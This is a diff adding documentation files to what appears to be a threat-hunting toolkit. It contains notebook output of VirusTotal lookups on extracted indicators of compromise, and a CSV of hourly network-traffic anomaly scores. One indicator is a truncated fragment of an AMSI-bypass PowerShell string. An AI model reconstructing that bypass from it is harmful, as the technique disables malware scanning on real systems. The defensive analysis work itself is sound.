+       "8                                                 NaN   \n",
+       "9                                                 NaN   \n",
+       "10                                                NaN   \n",
+       "11                                                NaN   \n",
+       "12                                                NaN   \n",
+       "13                                                NaN   \n",
+       "14                                                NaN   \n",
+       "15                                                NaN   \n",
+       "16  {\"response_code\": 0, \"resource\": \"http://syste...   \n",
+       "17                                                NaN   \n",
+       "18                                                NaN   \n",
+       "19                                                NaN   \n",
+       "20  {\"response_code\": 0, \"resource\": \"81ed03caf690...   \n",
+       "\n",
+       "                                             Resource SourceIndex  \\\n",
+       "0                                                 NaN          78   \n",
+       "1                                                 NaN         102   \n",
+       "2                                                 NaN           9   \n",
+       "3                                                 NaN           9   \n",
+       "4                                                 NaN           9   \n",
+       "5                                                 NaN          20   \n",
+       "6                                                 NaN          31   \n",
+       "7                                                 NaN          37   \n",
+       "8                                                 NaN          46   \n",
+       "9                                                 NaN          47   \n",
+       "10                                                NaN          77   \n",
+       "11                                                NaN          77   \n",
+       "12                                                NaN          31   \n",
+       "13                                                NaN          37   \n",
+       "14                                                NaN          46   \n",
+       "15                                                NaN          47   \n",
+       "16  http://system.management.automation.amsiutils'...          77   \n",
+       "17                                                NaN         102   \n",
+       "18                                                NaN          40   \n",
+       "19                                                NaN          41   \n",
+       "20                   81ed03caf6901e444c72ac67d192fb9c          44   \n",
+       "\n",
+       "                                           VerboseMsg  \\\n",
+       "0                               IP address in dataset   \n",
+       "1                                                 NaN   \n",
+       "2                                                 NaN   \n",
+       "3                                                 NaN   \n",
+       "4                                                 NaN   \n",
+       "5                                                 NaN   \n",
+       "6                                                 NaN   \n",
+       "7                                                 NaN   \n",
+       "8                                                 NaN   \n",
+       "9                                                 NaN   \n",
+       "10                                                NaN   \n",
+       "11                                                NaN   \n",
+       "12                                                NaN   \n",
+       "13                                                NaN   \n",
+       "14                                                NaN   \n",
+       "15                                                NaN   \n",
+       "16             Resource does not exist in the dataset   \n",
+       "17                                                NaN   \n",
+       "18                                                NaN   \n",
+       "19                                                NaN   \n",
+       "20  The requested resource is not among the finish...   \n",
+       "\n",
+       "                                             Resource ScanId Permalink  \\\n",
+       "0                                                 NaN    NaN       NaN   \n",
+       "1                                                 NaN    NaN       NaN   \n",
+       "2                                                 NaN    NaN       NaN   \n",
+       "3                                                 NaN    NaN       NaN   \n",
+       "4                                                 NaN    NaN       NaN   \n",
+       "5                                                 NaN    NaN       NaN   \n",
+       "6                                                 NaN    NaN       NaN   \n",
+       "7                                                 NaN    NaN       NaN   \n",
+       "8                                                 NaN    NaN       NaN   \n",
+       "9                                                 NaN    NaN       NaN   \n",
+       "10                                                NaN    NaN       NaN   \n",
+       "11                                                NaN    NaN       NaN   \n",
+       "12                                                NaN    NaN       NaN   \n",
+       "13                                                NaN    NaN       NaN   \n",
+       "14                                                NaN    NaN       NaN   \n",
+       "15                                                NaN    NaN       NaN   \n",
+       "16  http://system.management.automation.amsiutils'...    NaN       NaN   \n",
+       "17                                                NaN    NaN       NaN   \n",
+       "18                                                NaN    NaN       NaN   \n",
+       "19                                                NaN    NaN       NaN   \n",
+       "20                   81ed03caf6901e444c72ac67d192fb9c    NaN       NaN   \n",
+       "\n",
+       "   Positives  MD5 SHA1 SHA256  \\\n",
+       "0        162  NaN  NaN    NaN   \n",
+       "1        NaN  NaN  NaN    NaN   \n",
+       "2        NaN  NaN  NaN    NaN   \n",
+       "3        NaN  NaN  NaN    NaN   \n",
+       "4        NaN  NaN  NaN    NaN   \n",
+       "5        NaN  NaN  NaN    NaN   \n",
+       "6        NaN  NaN  NaN    NaN   \n",
+       "7        NaN  NaN  NaN    NaN   \n",
+       "8        NaN  NaN  NaN    NaN   \n",
+       "9        NaN  NaN  NaN    NaN   \n",
+       "10       NaN  NaN  NaN    NaN   \n",
+       "11       NaN  NaN  NaN    NaN   \n",
+       "12       NaN  NaN  NaN    NaN   \n",
+       "13       NaN  NaN  NaN    NaN   \n",
+       "14       NaN  NaN  NaN    NaN   \n",
+       "15       NaN  NaN  NaN    NaN   \n",
+       "16       NaN  NaN  NaN    NaN   \n",
+       "17       NaN  NaN  NaN    NaN   \n",
+       "18       NaN  NaN  NaN    NaN   \n",
+       "19       NaN  NaN  NaN    NaN   \n",
+       "20       NaN  NaN  NaN    NaN   \n",
+       "\n",
+       "                                      ResolvedDomains ResolvedIPs  \\\n",
+       "0   %2a.netaccess-india.com, 0-9.dgjtest030-pp-qm-...         NaN   \n",
+       "1                                                 NaN         NaN   \n",
+       "2                                                 NaN         NaN   \n",
+       "3                                                 NaN         NaN   \n",
+       "4                                                 NaN         NaN   \n",
+       "5                                                 NaN         NaN   \n",
+       "6                                                 NaN         NaN   \n",
+       "7                                                 NaN         NaN   \n",
+       "8                                                 NaN         NaN   \n",
+       "9                                                 NaN         NaN   \n",
+       "10                                                NaN         NaN   \n",
+       "11                                                NaN         NaN   \n",
+       "12                                                NaN         NaN   \n",
+       "13                                                NaN         NaN   \n",
+       "14                                                NaN         NaN   \n",
+       "15                                                NaN         NaN   \n",
+       "16                                                NaN         NaN   \n",
+       "17                                                NaN         NaN   \n",
+       "18                                                NaN         NaN   \n",
+       "19                                                NaN         NaN   \n",
+       "20                                                NaN         NaN   \n",
+       "\n",
+       "                                         DetectedUrls  \n",
+       "0   http://1.2.3.4:8347/, http://1.2.3.4/, http://...  \n",
+       "1                                                 NaN  \n",
+       "2                                                 NaN  \n",
+       "3                                                 NaN  \n",
+       "4                                                 NaN  \n",
+       "5                                                 NaN  \n",
+       "6                                                 NaN  \n",
+       "7                                                 NaN  \n",
+       "8                                                 NaN  \n",
+       "9                                                 NaN  \n",
+       "10                                                NaN  \n",
+       "11                                                NaN  \n",
+       "12                                                NaN  \n",
+       "13                                                NaN  \n",
+       "14                                                NaN  \n",
+       "15                                                NaN  \n",
+       "16                                                NaN  \n",
+       "17                                                NaN  \n",
+       "18                                                NaN  \n",
+       "19                                                NaN  \n",
+       "20                                                NaN  "
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "vt_lookup = VTLookup(vt_key.value, verbosity=2)\n",
+    "\n",
+    "# Submit a subset of the found IoCs (ignore dns since a lot of )\n",
+    "vt_results = vt_lookup.lookup_iocs(data=output_df, \n",
+    "                                   type_col='IoCType', \n",
+    "                                   src_col='Observable')\n",
+    "\n",
+    "display(vt_results)"
+   ]
+  }
+ ],
+ "metadata": {
+  "celltoolbar": "Tags",
+  "hide_input": false,
+  "kernelspec": {
+   "display_name": "Python 3",
+   "language": "python",
+   "name": "python3"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.7.9"
+  },
+  "toc": {
+   "base_numbering": 1,
+   "nav_menu": {
+    "height": "318.996px",
+    "width": "320.994px"
+   },
+   "number_sections": false,
+   "sideBar": true,
+   "skip_h1_title": false,
+   "title_cell": "Table of Contents",
+   "title_sidebar": "Contents",
+   "toc_cell": false,
+   "toc_position": {
+    "height": "calc(100% - 180px)",
+    "left": "10px",
+    "top": "150px",
+    "width": "165px"
+   },
+   "toc_section_display": true,
+   "toc_window_display": true
+  },
+  "varInspector": {
+   "cols": {
+    "lenName": 16,
+    "lenType": 16,
+    "lenVar": 40
+   },
+   "kernels_config": {
+    "python": {
+     "delete_cmd_postfix": "",
+     "delete_cmd_prefix": "del ",
+     "library": "var_list.py",
+     "varRefreshCmd": "print(var_dic_list())"
+    },
+    "r": {
+     "delete_cmd_postfix": ") ",
+     "delete_cmd_prefix": "rm(",
+     "library": "var_list.r",
+     "varRefreshCmd": "cat(var_dic_list()) "
+    }
+   },
+   "position": {
+    "height": "406.193px",
+    "left": "1468.4px",
+    "right": "20px",
+    "top": "120px",
+    "width": "456.572px"
+   },
+   "types_to_exclude": [
+    "module",
+    "function",
+    "builtin_function_or_method",
+    "instance",
+    "_Feature"
+   ],
+   "window_display": false
+  },
+  "widgets": {
+   "application/vnd.jupyter.widget-state+json": {
+    "state": {},
+    "version_major": 2,
+    "version_minor": 0
+   }
+  }
+ },
+ "nbformat": 4,
+ "nbformat_minor": 4
+}
diff --git a/docs/notebooks/data/TimeSeriesDemo.csv b/docs/notebooks/data/TimeSeriesDemo.csv
new file mode 100644
index 000000000..b26792dd9
--- /dev/null
+++ b/docs/notebooks/data/TimeSeriesDemo.csv
@@ -0,0 +1,841 @@
+TimeGenerated,TotalBytesSent,baseline,score,anomalies
+"2019-05-01T06:00:00Z",873713587,782728212,"0.22477580533770974",0
+"2019-05-01T07:00:00Z",882187669,838492449,0,0
+"2019-05-01T08:00:00Z",852506841,816772273,0,0
+"2019-05-01T09:00:00Z",898793650,878871426,0,0
+"2019-05-01T10:00:00Z",891598085,862639955,0,0
+"2019-05-01T11:00:00Z",893022551,829287276,0,0
+"2019-05-01T12:00:00Z",922677236,827135135,"0.3089416930559012",0
+"2019-05-01T13:00:00Z",856663011,795385715,0,0
+"2019-05-01T14:00:00Z",830763825,779642984,0,0
+"2019-05-01T15:00:00Z",855292297,774383611,"0.03865237602799538",0
+"2019-05-01T16:00:00Z",867265088,781543365,"0.127552510586356",0
+"2019-05-01T17:00:00Z",783423911,753274276,0,0
+"2019-05-01T18:00:00Z",797876828,830914353,0,0
+"2019-05-01T19:00:00Z",790012871,762032309,0,0
+"2019-05-01T20:00:00Z",852519704,781835274,0,0
+"2019-05-01T21:00:00Z",801772685,809785760,0,0
+"2019-05-01T22:00:00Z",807320821,816884986,0,0
+"2019-05-01T23:00:00Z",811995775,770342093,0,0
+"2019-05-02T00:00:00Z",857108417,840195542,0,0
+"2019-05-02T01:00:00Z",668803434,593764473,0,0
+"2019-05-02T02:00:00Z",644214662,633653057,0,0
+"2019-05-02T03:00:00Z",716435846,617656404,"0.368737630645067",0
+"2019-05-02T04:00:00Z",718165305,584982654,"1.0041887665795506",0
+"2019-05-02T05:00:00Z",846441590,868450796,0,0
+"2019-05-02T06:00:00Z",913851950,824453638,"0.19546166069276413",0
+"2019-05-02T07:00:00Z",909281093,841264748,0,0
+"2019-05-02T08:00:00Z",910496479,905043514,0,0
+"2019-05-02T09:00:00Z",860491701,849002163,0,0
+"2019-05-02T10:00:00Z",907134623,833155361,0,0
+"2019-05-02T11:00:00Z",951830968,912530827,0,0
+"2019-05-02T12:00:00Z",863445775,867229077,0,0
+"2019-05-02T13:00:00Z",883803886,900925622,0,0
+"2019-05-02T14:00:00Z",947731570,901918228,0,0
+"2019-05-02T15:00:00Z",897928218,802180467,"0.3127401906748501",0
+"2019-05-02T16:00:00Z",862303611,863377387,0,0
+"2019-05-02T17:00:00Z",891357428,781629234,"0.5709686755285784",0
+"2019-05-02T18:00:00Z",874557665,792559337,"0.058778819047480696",0
+"2019-05-02T19:00:00Z",802427120,817137018,0,0
+"2019-05-02T20:00:00Z",869716161,841892249,0,0
+"2019-05-02T21:00:00Z",851558231,771153881,"0.029336929441758537",0
+"2019-05-02T22:00:00Z",906453909,877857161,0,0
+"2019-05-02T23:00:00Z",843625312,815701033,0,0
+"2019-05-03T00:00:00Z",807469579,859362524,0,0
+"2019-05-03T01:00:00Z",695427997,719382993,0,0
+"2019-05-03T02:00:00Z",643948011,651681106,0,0
+"2019-05-03T03:00:00Z",677938461,705805457,0,0
+"2019-05-03T04:00:00Z",666457868,711761070,0,0
+"2019-05-03T05:00:00Z",890567174,935619166,0,0
+"2019-05-03T06:00:00Z",920136656,867554929,0,0
+"2019-05-03T07:00:00Z",864647530,899560537,0,0
+"2019-05-03T08:00:00Z",865802529,861332483,0,0
+"2019-05-03T09:00:00Z",937646970,941991590,0,0
+"2019-05-03T10:00:00Z",918357380,892879165,0,0
+"2019-05-03T11:00:00Z",889610303,940863613,0,0
+"2019-05-03T12:00:00Z",913645805,869347154,0,0
+"2019-05-03T13:00:00Z",887186534,871274006,0,0
+"2019-05-03T14:00:00Z",965532850,931892874,0,0
+"2019-05-03T15:00:00Z",825807779,827145513,0,0
+"2019-05-03T16:00:00Z",903819076,834319239,0,0
+"2019-05-03T17:00:00Z",827999022,868153889,0,0
+"2019-05-03T18:00:00Z",916732278,810776109,"0.5012967514416928",0
+"2019-05-03T19:00:00Z",903529290,815633114,"0.16771615655359734",0
+"2019-05-03T20:00:00Z",869875766,839608026,0,0
+"2019-05-03T21:00:00Z",877268278,963692359,"-0.27949429249550806",0
+"2019-05-03T22:00:00Z",901985353,905828543,0,0
+"2019-05-03T23:00:00Z",820902488,817579119,0,0
+"2019-05-04T00:00:00Z",839550728,842202948,0,0
+"2019-05-04T01:00:00Z",697140933,659721145,0,0
+"2019-05-04T02:00:00Z",725116765,722122204,0,0
+"2019-05-04T03:00:00Z",718391605,733766443,0,0
+"2019-05-04T04:00:00Z",734634539,703733119,0,0
+"2019-05-04T05:00:00Z",961618771,922241034,0,0
+"2019-05-04T06:00:00Z",973519876,943325352,0,0
+"2019-05-04T07:00:00Z",931452710,963709930,0,0
+"2019-05-04T08:00:00Z",936782632,926920313,0,0
+"2019-05-04T09:00:00Z",902828719,973987058,0,0
+"2019-05-04T10:00:00Z",956018750,899927470,0,0
+"2019-05-04T11:00:00Z",901050381,934033855,0,0
+"2019-05-04T12:00:00Z",986348136,891078758,"0.30390432099064785",0
+"2019-05-04T13:00:00Z",888182919,902327091,0,0
+"2019-05-04T14:00:00Z",895773023,935399922,0,0
+"2019-05-04T15:00:00Z",860244868,833741778,0,0
+"2019-05-04T16:00:00Z",894638180,868297498,0,0
+"2019-05-04T17:00:00Z",932630230,924570125,0,0
+"2019-05-04T18:00:00Z",877076050,939614735,0,0
+"2019-05-04T19:00:00Z",904708616,855176106,0,0
+"2019-05-04T20:00:00Z",885212895,864204455,0,0
+"2019-05-04T21:00:00Z",928834714,940088893,0,0
+"2019-05-04T22:00:00Z",882928145,885477017,0,0
+"2019-05-04T23:00:00Z",897273726,930767987,0,0
+"2019-05-05T00:00:00Z",845388269,947891718,"-0.5764913730613784",0
+"2019-05-05T01:00:00Z",730597647,753481566,0,0
+"2019-05-05T02:00:00Z",733994909,743319851,0,0
+"2019-05-05T03:00:00Z",696100730,773768796,"-0.11776463288417649",0
+"2019-05-05T04:00:00Z",677795812,780521037,"-0.580587737214088",0
+"2019-05-05T05:00:00Z",944003798,1018053693,"-0.05093449941994866",0
+"2019-05-05T06:00:00Z",940124451,930826610,0,0
+"2019-05-05T07:00:00Z",903070877,961383610,0,0
+"2019-05-05T08:00:00Z",966821399,957957722,0,0
+"2019-05-05T09:00:00Z",928572732,1007632396,"-0.14346841536288993",0
+"2019-05-05T10:00:00Z",968103682,955572286,0,0
+"2019-05-05T11:00:00Z",942345100,942430440,0,0
+"2019-05-05T12:00:00Z",918154112,992963535,"-0.06496350786103529",0
+"2019-05-05T13:00:00Z",908724455,1006444608,"-0.4881405797402798",0
+"2019-05-05T14:00:00Z",969661489,978721174,0,0
+"2019-05-05T15:00:00Z",869552513,977263921,"-0.6726859843585694",0
+"2019-05-05T16:00:00Z",928906452,976726063,0,0
+"2019-05-05T17:00:00Z",858754943,776466525,"0.06413697228677083",0
+"2019-05-05T18:00:00Z",852800036,893485862,0,0
+"2019-05-05T19:00:00Z",956027685,877425622,0,0
+"2019-05-05T20:00:00Z",899862034,925234199,0,0
+"2019-05-05T21:00:00Z",914327713,933873586,0,0
+"2019-05-05T22:00:00Z",868670704,934443479,0,0
+"2019-05-05T23:00:00Z",863683195,930252167,0,0
+"2019-05-06T00:00:00Z",905245396,918695020,0,0
+"2019-05-06T01:00:00Z",698524204,785937427,"-0.29776443781558304",0
+"2019-05-06T02:00:00Z",751378763,780949574,0,0
+"2019-05-06T03:00:00Z",788098393,807391430,0,0
+"2019-05-06T04:00:00Z",718327017,739816775,0,0
+"2019-05-06T05:00:00Z",457637899,503066152,0,0
+"2019-05-06T06:00:00Z",407128034,450789237,0,0
+"2019-05-06T07:00:00Z",427965408,450791477,0,0
+"2019-05-06T08:00:00Z",416582611,461538221,0,0
+"2019-05-06T09:00:00Z",405735621,420605299,0,0
+"2019-05-06T10:00:00Z",475934081,508388772,0,0
+"2019-05-06T11:00:00Z",391911247,422420194,0,0
+"2019-05-06T12:00:00Z",382779518,486230478,"-0.5939925529940308",0
+"2019-05-06T13:00:00Z",418150700,509154234,"-0.3640799766596015",0
+"2019-05-06T14:00:00Z",439492547,440590957,0,0
+"2019-05-06T15:00:00Z",344212429,436209894,"-0.38243856621289407",0
+"2019-05-06T16:00:00Z",385151272,398047149,0,0
+"2019-05-06T17:00:00Z",402634638,537753963,"-1.1789292254564947",0
+"2019-05-06T18:00:00Z",348130418,424510374,"-0.09397233410938484",0
+"2019-05-06T19:00:00Z",330143017,449308692,"-0.8842542571142157",0
+"2019-05-06T20:00:00Z",412007535,384917009,0,0
+"2019-05-06T21:00:00Z",354978767,393124060,0,0
+"2019-05-06T22:00:00Z",383963655,451471221,0,0
+"2019-05-06T23:00:00Z",426783985,398097017,0,0
+"2019-05-07T00:00:00Z",402920595,479170002,"-0.09156100569615545",0
+"2019-05-07T01:00:00Z",216671778,305958421,"-0.3323677948754185",0
+"2019-05-07T02:00:00Z",186952988,239657577,0,0
+"2019-05-07T03:00:00Z",256555183,303003481,0,0
+"2019-05-07T04:00:00Z",237640219,277530138,0,0
+"2019-05-07T05:00:00Z",459615281,470459899,0,0
+"2019-05-07T06:00:00Z",450916734,455307042,0,0
+"2019-05-07T07:00:00Z",439791726,497919841,0,0
+"2019-05-07T08:00:00Z",407339745,472090343,0,0
+"2019-05-07T09:00:00Z",460514032,522245900,0,0
+"2019-05-07T10:00:00Z",473271204,468673483,0,0
+"2019-05-07T11:00:00Z",42271963,526325565,"-7.623987358317351","-1"
+"2019-05-07T12:00:00Z",452867549,543867955,"-0.36402219325240215",0
+"2019-05-07T13:00:00Z",433833905,475005479,0,0
+"2019-05-07T14:00:00Z",412908587,452540132,0,0
+"2019-05-07T15:00:00Z",399529976,466641755,0,0
+"2019-05-07T16:00:00Z",351788448,429435883,"-0.11738356450687881",0
+"2019-05-07T17:00:00Z",357793541,486191096,"-1.0547734798329436",0
+"2019-05-07T18:00:00Z",420058661,411308877,0,0
+"2019-05-07T19:00:00Z",388618694,471473364,"-0.2135647986837754",0
+"2019-05-07T20:00:00Z",344244340,451967634,"-0.6729055307907593",0
+"2019-05-07T21:00:00Z",384677308,460959999,"-0.09217578261917596",0
+"2019-05-07T22:00:00Z",350548288,420735515,0,0
+"2019-05-07T23:00:00Z",433051287,511251366,"-0.1275912819676799",0
+"2019-05-08T00:00:00Z",434604199,495208287,0,0
+"2019-05-08T01:00:00Z",227336212,299834266,"-0.02227091970648288",0
+"2019-05-08T02:00:00Z",181142300,285379985,"-0.6085239170180202",0
+"2019-05-08T03:00:00Z",225420990,338118899,"-0.764790119819126",0
+"2019-05-08T04:00:00Z",242379095,347397372,"-0.6229419872636673",0
+"2019-05-08T05:00:00Z",1022669703,1045330030,0,0
+"2019-05-08T06:00:00Z",953364734,907081787,0,0
+"2019-05-08T07:00:00Z",1033085221,962846024,0,0
+"2019-05-08T08:00:00Z",969714599,941125848,0,0
+"2019-05-08T09:00:00Z",1013729943,1003225001,0,0
+"2019-05-08T10:00:00Z",981345529,986993531,0,0
+"2019-05-08T11:00:00Z",1037288750,953640852,"0.08924752394030556",0
+"2019-05-08T12:00:00Z",991165062,951488710,0,0
+"2019-05-08T13:00:00Z",984493550,919739290,0,0
+"2019-05-08T14:00:00Z",978367044,903996559,0,0
+"2019-05-08T15:00:00Z",938879683,898737186,0,0
+"2019-05-08T16:00:00Z",955831823,905896940,0,0
+"2019-05-08T17:00:00Z",905906975,877627852,0,0
+"2019-05-08T18:00:00Z",957606717,955267929,0,0
+"2019-05-08T19:00:00Z",929509010,886385884,0,0
+"2019-05-08T20:00:00Z",1002659157,906188849,"0.3260863181185105",0
+"2019-05-08T21:00:00Z",935735110,934139335,0,0
+"2019-05-08T22:00:00Z",930332470,941238561,0,0
+"2019-05-08T23:00:00Z",956107825,894695668,0,0
+"2019-05-09T00:00:00Z",984858191,964549118,0,0
+"2019-05-09T01:00:00Z",855085656,718118049,"1.0740995342448576",0
+"2019-05-09T02:00:00Z",753446631,758006632,0,0
+"2019-05-09T03:00:00Z",806497013,742009979,0,0
+"2019-05-09T04:00:00Z",799747641,709336229,"0.21417430965073",0
+"2019-05-09T05:00:00Z",1026442326,992804371,0,0
+"2019-05-09T06:00:00Z",1077848994,948807213,"0.9277040255735892",0
+"2019-05-09T07:00:00Z",1042074279,965618324,0,0
+"2019-05-09T08:00:00Z",989569304,1029397090,0,0
+"2019-05-09T09:00:00Z",1057453529,973355738,"0.09755734559804624",0
+"2019-05-09T10:00:00Z",1057338096,957508936,"0.38812664544402214",0
+"2019-05-09T11:00:00Z",1067745732,1036884402,0,0
+"2019-05-09T12:00:00Z",1039937078,991582652,0,0
+"2019-05-09T13:00:00Z",634395781,1025279198,"-5.903069409478549","-1"
+"2019-05-09T14:00:00Z",1038853034,1026271804,0,0
+"2019-05-09T15:00:00Z",988661138,926534042,0,0
+"2019-05-09T16:00:00Z",971145433,987730962,0,0
+"2019-05-09T17:00:00Z",1020524701,905982809,"0.6598810111770272",0
+"2019-05-09T18:00:00Z",1023040605,916912912,"0.5044649220500946",0
+"2019-05-09T19:00:00Z",1026067148,941490593,"0.10640045746028724",0
+"2019-05-09T20:00:00Z",974899180,966245825,0,0
+"2019-05-09T21:00:00Z",925481646,895507457,0,0
+"2019-05-09T22:00:00Z",1008014066,1002210736,0,0
+"2019-05-09T23:00:00Z",978065792,940054608,0,0
+"2019-05-10T00:00:00Z",976248064,983716099,0,0
+"2019-05-10T01:00:00Z",788591993,843736568,0,0
+"2019-05-10T02:00:00Z",819890342,776034681,0,0
+"2019-05-10T03:00:00Z",776408096,830159033,0,0
+"2019-05-10T04:00:00Z",826110086,836114646,0,0
+"2019-05-10T05:00:00Z",1034936595,1059972741,0,0
+"2019-05-10T06:00:00Z",1039212114,991908504,0,0
+"2019-05-10T07:00:00Z",1022464025,1023914112,0,0
+"2019-05-10T08:00:00Z",1075642770,985686058,"0.20577568745016528",0
+"2019-05-10T09:00:00Z",1055035913,1066345165,0,0
+"2019-05-10T10:00:00Z",1061634536,1017232741,0,0
+"2019-05-10T11:00:00Z",1076072442,1065217189,0,0
+"2019-05-10T12:00:00Z",1061904372,993700729,0,0
+"2019-05-10T13:00:00Z",1051809129,995627581,0,0
+"2019-05-10T14:00:00Z",1055544997,1056246449,0,0
+"2019-05-10T15:00:00Z",1039038521,951499088,"0.1611268681785681",0
+"2019-05-10T16:00:00Z",946540104,958672814,0,0
+"2019-05-10T17:00:00Z",982693333,992507465,0,0
+"2019-05-10T18:00:00Z",1040505474,935129685,"0.4905767434238082",0
+"2019-05-10T19:00:00Z",963020903,939986689,0,0
+"2019-05-10T20:00:00Z",1017382900,963961601,0,0
+"2019-05-10T21:00:00Z",974943158,1088045934,"-0.7722682995246348",0
+"2019-05-10T22:00:00Z",986877436,1030182118,0,0
+"2019-05-10T23:00:00Z",977686629,941932695,0,0
+"2019-05-11T00:00:00Z",946411386,966556524,0,0
+"2019-05-11T01:00:00Z",818997628,784074720,0,0
+"2019-05-11T02:00:00Z",799954180,846475779,0,0
+"2019-05-11T03:00:00Z",862299582,858120018,0,0
+"2019-05-11T04:00:00Z",836341534,828086694,0,0
+"2019-05-11T05:00:00Z",1025090070,1046594609,0,0
+"2019-05-11T06:00:00Z",1007907120,1067678928,0,0
+"2019-05-11T07:00:00Z",1027324682,1088063506,0,0
+"2019-05-11T08:00:00Z",1016950649,1051273888,0,0
+"2019-05-11T09:00:00Z",1090135061,1098340633,0,0
+"2019-05-11T10:00:00Z",1066631292,1024281045,0,0
+"2019-05-11T11:00:00Z",1087552149,1058387430,0,0
+"2019-05-11T12:00:00Z",1011146902,1015432333,0,0
+"2019-05-11T13:00:00Z",1096276461,1026680667,0,0
+"2019-05-11T14:00:00Z",1053690335,1059753498,0,0
+"2019-05-11T15:00:00Z",1026041317,958095353,0,0
+"2019-05-11T16:00:00Z",995544290,992651073,0,0
+"2019-05-11T17:00:00Z",964045673,1048923700,"-0.25093760912577723",0
+"2019-05-11T18:00:00Z",1007207382,1063968310,0,0
+"2019-05-11T19:00:00Z",976018535,979529681,0,0
+"2019-05-11T20:00:00Z",1044530213,988558031,0,0
+"2019-05-11T21:00:00Z",1056525176,1064442469,0,0
+"2019-05-11T22:00:00Z",1009998583,1009830592,0,0
+"2019-05-11T23:00:00Z",1020296930,1055121562,0,0
+"2019-05-12T00:00:00Z",996836955,1072245293,"-0.07602588431787634",0
+"2019-05-12T01:00:00Z",858490388,877835141,0,0
+"2019-05-12T02:00:00Z",830213157,867673426,0,0
+"2019-05-12T03:00:00Z",845167877,898122372,0,0
+"2019-05-12T04:00:00Z",837203412,904874613,0,0
+"2019-05-12T05:00:00Z",1100015423,1142407268,0,0
+"2019-05-12T06:00:00Z",1074240368,1055180185,0,0
+"2019-05-12T07:00:00Z",1085046504,1085737185,0,0
+"2019-05-12T08:00:00Z",1119540427,1082311297,0,0
+"2019-05-12T09:00:00Z",1066062542,1131985972,0,0
+"2019-05-12T10:00:00Z",1111993335,1079925862,0,0
+"2019-05-12T11:00:00Z",1074743022,1066784015,0,0
+"2019-05-12T12:00:00Z",1075393902,1117317110,0,0
+"2019-05-12T13:00:00Z",1096429594,1130798183,0,0
+"2019-05-12T14:00:00Z",1104942722,1103074749,0,0
+"2019-05-12T15:00:00Z",1043375756,1101617496,0,0
+"2019-05-12T16:00:00Z",1004789142,1101079639,"-0.46173383894321646",0
+"2019-05-12T17:00:00Z",1009115136,900820101,"0.5444972403123636",0
+"2019-05-12T18:00:00Z",1036882213,1017839437,0,0
+"2019-05-12T19:00:00Z",998556234,1001779197,0,0
+"2019-05-12T20:00:00Z",1061527144,1049587774,0,0
+"2019-05-12T21:00:00Z",1059037422,1058227161,0,0
+"2019-05-12T22:00:00Z",982935955,1058797054,"-0.08438868967444167",0
+"2019-05-12T23:00:00Z",1070078489,1054605743,0,0
+"2019-05-13T00:00:00Z",1074805675,1043048596,0,0
+"2019-05-13T01:00:00Z",823993813,910291002,"-0.27715052104596016",0
+"2019-05-13T02:00:00Z",845965247,905303149,0,0
+"2019-05-13T03:00:00Z",908350645,931745005,0,0
+"2019-05-13T04:00:00Z",909155856,864170350,0,0
+"2019-05-13T05:00:00Z",594596972,627419727,0,0
+"2019-05-13T06:00:00Z",588339826,575142813,0,0
+"2019-05-13T07:00:00Z",513974580,575145053,0,0
+"2019-05-13T08:00:00Z",498608477,585891796,"-0.29536502560426325",0
+"2019-05-13T09:00:00Z",564220831,544958874,0,0
+"2019-05-13T10:00:00Z",526136510,632742347,"-0.6522653302465867",0
+"2019-05-13T11:00:00Z",537404241,546773769,0,0
+"2019-05-13T12:00:00Z",503702057,610584053,"-0.6573661730939895",0
+"2019-05-13T13:00:00Z",562529456,633507810,0,0
+"2019-05-13T14:00:00Z",565679688,564944533,0,0
+"2019-05-13T15:00:00Z",446033781,560563469,"-0.7986243592979421",0
+"2019-05-13T16:00:00Z",493641472,522400724,0,0
+"2019-05-13T17:00:00Z",916767394,662107538,"3.247956998067613",1
+"2019-05-13T18:00:00Z",467545424,548863949,"-0.18519113438462445",0
+"2019-05-13T19:00:00Z",466436663,573662268,"-0.6637128691125138",0
+"2019-05-13T20:00:00Z",459461022,509270585,0,0
+"2019-05-13T21:00:00Z",486413184,517477635,0,0
+"2019-05-13T22:00:00Z",538919515,575824796,0,0
+"2019-05-13T23:00:00Z",494288347,522450592,0,0
+"2019-05-14T00:00:00Z",503115084,603523577,"-0.5377960868269708",0
+"2019-05-14T01:00:00Z",338429270,430311996,"-0.38031925391960514",0
+"2019-05-14T02:00:00Z",376607397,364011153,0,0
+"2019-05-14T03:00:00Z",335536198,427357057,"-0.3791765220831175",0
+"2019-05-14T04:00:00Z",305752110,401883713,"-0.4587989695644088",0
+"2019-05-14T05:00:00Z",579716989,594813474,0,0
+"2019-05-14T06:00:00Z",607277895,579660617,0,0
+"2019-05-14T07:00:00Z",580925641,622273416,0,0
+"2019-05-14T08:00:00Z",591887341,596443918,0,0
+"2019-05-14T09:00:00Z",535053510,646599476,"-0.7435129324048917",0
+"2019-05-14T10:00:00Z",542852243,593027059,0,0
+"2019-05-14T11:00:00Z",600980027,650679140,0,0
+"2019-05-14T12:00:00Z",572841825,668221530,"-0.44491088870298495",0
+"2019-05-14T13:00:00Z",610227565,599359054,0,0
+"2019-05-14T14:00:00Z",597944660,576893707,0,0
+"2019-05-14T15:00:00Z",478582894,590995330,"-0.7595172364807544",0
+"2019-05-14T16:00:00Z",533450021,553789459,0,0
+"2019-05-14T17:00:00Z",523528503,610544672,"-0.2904305640256278",0
+"2019-05-14T18:00:00Z",483109880,535662452,0,0
+"2019-05-14T19:00:00Z",575159745,595826939,0,0
+"2019-05-14T20:00:00Z",542252387,576321209,0,0
+"2019-05-14T21:00:00Z",545441292,585313574,0,0
+"2019-05-14T22:00:00Z",575681208,545089090,0,0
+"2019-05-14T23:00:00Z",566276013,635604942,0,0
+"2019-05-15T00:00:00Z",572591706,619561863,0,0
+"2019-05-15T01:00:00Z",353152221,424187841,0,0
+"2019-05-15T02:00:00Z",351089795,409733560,0,0
+"2019-05-15T03:00:00Z",402680601,462472474,0,0
+"2019-05-15T04:00:00Z",398099696,471750947,"-0.043571265355461714",0
+"2019-05-15T05:00:00Z",1124558087,1169683606,0,0
+"2019-05-15T06:00:00Z",1094578207,1031435363,0,0
+"2019-05-15T07:00:00Z",1149602244,1087199599,0,0
+"2019-05-15T08:00:00Z",1127141868,1065479423,0,0
+"2019-05-15T09:00:00Z",1188500821,1127578576,0,0
